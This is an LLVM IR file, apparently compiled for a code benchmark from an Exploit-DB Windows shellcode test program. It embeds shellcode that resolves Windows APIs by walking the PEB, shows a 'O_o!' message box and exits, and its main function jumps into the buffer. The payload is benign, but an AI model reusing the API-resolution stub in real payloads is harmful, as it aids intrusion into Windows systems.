; ModuleID = '/home/carl/AnghaBench/exploitdb/shellcodes/windows/extr_13828.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/shellcodes/windows/extr_13828.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.shellcode = private unnamed_addr constant [239 x i8] c"\FC3\D2\B20d\FF2Z\8BR\0C\8BR\14\8Br(3\C9\B1\183\FF3\C0\AC<a|\02, \C1\CF\0D\03\F8\E2\F0\81\FF[\BCJj\8BZ\10\8B\12u\DA\8BS<\03\D3\FFr4\8BRx\03\D3\8Br \03\F33\C9A\AD\03\C3\818GetPu\F4\81x\04rocAu\EB\81x\08ddreu\E2I\8Br$\03\F3f\8B\0CN\8Br\1C\03\F3\8B\14\8E\03\D3R3\FFWharyAhLibrhLoadTS\FF\D2h32\01\01f\89|$\02huserT\FF\D0hoxA\01\8B\DF\88\\$\03hageBhMessTP\FFT$,WhO_o!\8B\DCWSSW\FF\D0hess\01\8B\DF\88\\$\03hProchExitT\FFt$@\FFT$@W\FF\D0\00", align 16
@.str = private unnamed_addr constant [11 x i8] c"Size = %d\0A\00", align 1
@.str.1 = private unnamed_addr constant [6 x i8] c"PAUSE\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca [239 x i8], align 16
  store i32 0, i32* %1, align 4
  %3 = bitcast [239 x i8]* %2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %3, i8* align 16 getelementptr inbounds ([239 x i8], [239 x i8]* @__const.main.shellcode, i32 0, i32 0), i64 239, i1 false)
  %4 = getelementptr inbounds [239 x i8], [239 x i8]* %2, i64 0, i64 0
  %5 = call i32 @strlen(i8* %4)
  %6 = call i32 @printf(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str, i64 0, i64 0), i32 %5)
  %7 = call i32 @system(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.1, i64 0, i64 0))
  %8 = getelementptr inbounds [239 x i8], [239 x i8]* %2, i64 0, i64 0
  %9 = bitcast i8* %8 to void (...)*
  call void (...) %9()
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @printf(i8*, i32) #2

declare dso_local i32 @strlen(i8*) #2

declare dso_local i32 @system(i8*) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
